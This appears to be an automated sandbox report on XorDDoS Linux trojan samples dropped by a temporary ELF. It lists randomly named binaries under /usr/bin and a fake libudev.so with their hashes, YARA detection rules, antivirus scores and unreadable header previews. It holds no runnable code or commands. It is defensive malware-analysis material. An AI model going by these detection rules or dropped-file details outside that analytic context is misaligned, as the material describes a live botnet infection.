Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mqnheeruxi, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mqnheeruxi, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/mqnheeruxi, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mqnheeruxi, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/mqnheeruxi, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/mqnheeruxi, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mqnheeruxi, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ogbruyreel

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183067515689522
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk37:VB2WCH/eMU9Uc8gd49N94BJXQLL4ru7
MD5:	D44C955C88D57D2D4648924F0F170C84
SHA1:	E01B550711DFBD22DF9558E9AC3CF827AEEBE31E
SHA-256:	7674BB78385CFBEF1A9632EDD7B2F6D053F2E4F552CEC262CFD7736C9E465628
SHA-512:	CD1C5C5320CC63344108241F0E56FB7BF47CFBFC10F605C4DCD2FB061699338FBAC4B8FEF08CCCE5865E9352BB025D8326BBB608028175AD511246212A1DE1BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ogbruyreel, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ogbruyreel, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ogbruyreel, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ogbruyreel, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ogbruyreel, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ogbruyreel, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ogbruyreel, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/piqqogcjxo

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, missing section headers at 555232
Category:	dropped
Size (bytes):	323584
Entropy (8bit):	6.283665241779757
Encrypted:	false
SSDEEP:	6144:VBEPbw1sdgM/FScAznbIU9YasNi8lCSUvsytelqi24Mr:VB2bw1CH/FwznbIU9sE8c8lqd4M
MD5:	AFD0D4B581171A2EF6E24BAD7A89BCFD
SHA1:	E214CDE0C0DA9382793E258E82919D8130689195
SHA-256:	603CF7BD10530607BB60133DF6E79EA7692DCDC7B1E54A20BEA8A7C8BCC81D47
SHA-512:	617322E95AA4ABFCA8D8C48BCE70D6BD45826C87203C767D33256248D63DF28C04935FD642395A9B817A633894F67A65800C92CA1F0610D66CE990F2ED57AEA3
Malicious:	true
Yara Hits:	Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/piqqogcjxo, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/piqqogcjxo, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/piqqogcjxo, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/piqqogcjxo, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/pmvkvnihjm

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183065056243085
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3b:VB2WCH/eMU9Uc8gd49N94BJXQLL4rub
MD5:	3A610F09DA7280C7D83A04A51D4E7144
SHA1:	6A38776E3CAE4E7AA15477AE93281F93739EC6B9
SHA-256:	D2DC62E2F4E594E188846C2D674A606F54C5BD4460C9D41295CE8B7182FD42A5
SHA-512:	99E9454E6E3938D0A27AAF13F7B4AE016769397304CC2E93F16294C7641A033A5EC2AFB09877CEA2467DB97C04B2317D590CAB92F828242ADD4D16C934861EAE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/pmvkvnihjm, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/pmvkvnihjm, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/pmvkvnihjm, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/pmvkvnihjm, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/pmvkvnihjm, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/pmvkvnihjm, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/pmvkvnihjm, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/rfjhcudkoa

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183056678522777
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3x:VB2WCH/eMU9Uc8gd49N94BJXQLL4rux
MD5:	485F8E4DB36662CAEF27F8C74FD55014
SHA1:	52C7B87B8A0D19F8324ECE523B7840611F716B72
SHA-256:	F874225588EE5C881E51D32DD2170026EB1AD27AB7B258F51EEE13E0ED60B49C
SHA-512:	8383F1B6AF6939C020A842BE60D9D1B5470E817545DC218F65AEC443DEBC1B41A0341A5F2F2040D7BC9C2AAB810EFED278021CE4F98B244EE09A7B1D89AE9988
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/rfjhcudkoa, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/rfjhcudkoa, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/rfjhcudkoa, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/rfjhcudkoa, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/rfjhcudkoa, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/rfjhcudkoa, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/rfjhcudkoa, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ucawyxmhdv

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183053273118786
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3N:VB2WCH/eMU9Uc8gd49N94BJXQLL4ruN
MD5:	A0C739B76D925C3BEEB3CCBA01B8E61D
SHA1:	AEF656A03AEBDE93BC4F757F3B7F183E50A57CF0
SHA-256:	5B27ABC012A9732B23D71CEB6C49447576B8A93379E67F4BC0DE772F5EA3AB24
SHA-512:	B190222C8432CDA638F0D2D82ABDA943D4379E8F46CBBECD083C2C9F082EDC775F35A683AB6F9E00E76DD8E11623476AAD5D8EF0E90A89DB28B226B09075A670
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ucawyxmhdv, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ucawyxmhdv, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ucawyxmhdv, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ucawyxmhdv, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ucawyxmhdv, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ucawyxmhdv, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ucawyxmhdv, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/vwtoogupfm

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183069741478003
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3f:VB2WCH/eMU9Uc8gd49N94BJXQLL4ruf
MD5:	3E698362DCFF12549AAFF5CD24BEE294
SHA1:	AB55823FECD5F2FB6C7AD78A03B7D8533B4F6D8E
SHA-256:	E1E20BA819126562212E737D0138E9CE8BF2C52C09F68D8D5CA84331897BA5FF
SHA-512:	F368E42121469931297BBDD18AFC587C75408F88BE27E8CD4B64CCF5976955C2487A7BB1EE397A47DCC53493A4D9A85AAD2198F2509A63933A3635D74E2FDCF0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vwtoogupfm, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vwtoogupfm, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/vwtoogupfm, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vwtoogupfm, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/vwtoogupfm, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/vwtoogupfm, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vwtoogupfm, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wrvgghkqdd

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183064339327861
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk31:VB2WCH/eMU9Uc8gd49N94BJXQLL4ru1
MD5:	B46C27DAFDCDB69E28D3B3DFB37E3FA6
SHA1:	C53225F6A1ACFAAF3B66E5A7C17A5F829365FD58
SHA-256:	D05121E6CE562A048D98591E19E129B6F4AB857C0804147412AFF1B63166079D
SHA-512:	632A60B87DE8F7F3519DDAE3081B4AEC7F644C6B031E1429AB84FA805C5B62143772817D6C62BB8D10799936E162BC210CB8F83AE92488C723E5D1567E84172E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wrvgghkqdd, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wrvgghkqdd, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wrvgghkqdd, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wrvgghkqdd, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wrvgghkqdd, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wrvgghkqdd, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wrvgghkqdd, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/xilfqxoepi

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.1830423917527915
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3Y:VB2WCH/eMU9Uc8gd49N94BJXQLL4ruY
MD5:	82E2169758546DB0029F9A84DA52C335
SHA1:	9E845CE947A37ED0532F91C18A22CB78F1174574
SHA-256:	8D20FCC93CC3FEB90497B8A29C277426A869FB96E86BE60A1F87D8A45BE2BA1D
SHA-512:	185D48DB9ECE9588454CFC82A1B2848A7A60D017BE2BF252483A0F587822C4CE115A8522241FF8C871E12124B214C3A85C8322E3FEC5468B953331B45F8986CA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/xilfqxoepi, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/xilfqxoepi, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/xilfqxoepi, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/xilfqxoepi, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/xilfqxoepi, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/xilfqxoepi, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/xilfqxoepi, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ybavzvdbws

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.18305716665787
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk32:VB2WCH/eMU9Uc8gd49N94BJXQLL4ru2
MD5:	62624E51356ED9FF5514215BE98A5C72
SHA1:	6BDAC063074863D1372ADD5312BC5041B530E2F2
SHA-256:	5105A3A2270471A16B95966256ECBF73DCD086DAEED3351E7846CBE22F1CAE52
SHA-512:	68871B399F5B0CB487F034B3B662F11CCEBD60643E6901676F1664D3C8DFFE628F16723EE207D411C6FB47670BF3D910BC9FE97A264862904B6B87849EC03109
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ybavzvdbws, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ybavzvdbws, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ybavzvdbws, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ybavzvdbws, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ybavzvdbws, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ybavzvdbws, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ybavzvdbws, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/zuuufkngmy

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183057697153255
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3A:VB2WCH/eMU9Uc8gd49N94BJXQLL4ruA
MD5:	FA9F67EE8844791D0B402596A66ED3AA
SHA1:	FF564D171FA157742B7CC6791B27437628C9F160
SHA-256:	579D3FC054872FC54D141CE7936AB201EF1D809686D71394E8A0CAB57017D080
SHA-512:	927EA448601DDEDD8625BD54DB4C8444B4D068CF8F631E149F98B5BE58325022F17B2F13259DA850A1E33E0B661DA957E6F8C1BD14615AEF26F3548D1E211D5B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zuuufkngmy, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zuuufkngmy, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/zuuufkngmy, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zuuufkngmy, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/zuuufkngmy, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/zuuufkngmy, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zuuufkngmy, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/zygafieftp

Download File

Process:	/tmp/TmoTjBkSXT.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	555283
Entropy (8bit):	6.183068966566412
Encrypted:	false
SSDEEP:	12288:VB2bw1CH/FwznbIU9sE8c8lqd49N94wT4JXQLLp6yWrk3a:VB2WCH/eMU9Uc8gd49N94BJXQLL4rua
MD5:	CF8CB8D9BC20BD48C2A9DB69AA9CD54F
SHA1:	E064633115FA2F23E5FF2FB76858ED3A1BC5415B
SHA-256:	BE63E421242CDED4B210CC1D575917EC9C759C06D4C9F4266960AD41803ECB97
SHA-512:	F65D542188CA65B44CE380B4DC6D82EE2283FF649DD5AF946B7E86085306E99DD13DAA5D8EF962B8D8116A60D28771B2719FF80EE3BB1285ACB6278BC0186E17
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zygafieftp, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zygafieftp, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/zygafieftp, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zygafieftp, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/zygafieftp, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/zygafieftp, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zygafieftp, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....t......4. ...(......................c...c...............d..............Ls........................ ... ................d..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh T..h`T..QVh............U..S........[.. s..........t..~..X[.......U..S....=.....uT.$...-........X......9.v...&........................9.w......t...$..................[]......U..............Z..r....t .T$..D$......D$.......$.........(.....t........t...$(.......U.....E..D$..E..D$..E...$.y....E..D$..E...$...........U...(.E.....D$..E..D$...$..........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$......E..D$..D$......D$.............$......E.....D$..E..D$.........$......E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/lib/libudev.so

Download File

Process:	/tmp/TmoTjBkSXT.elf
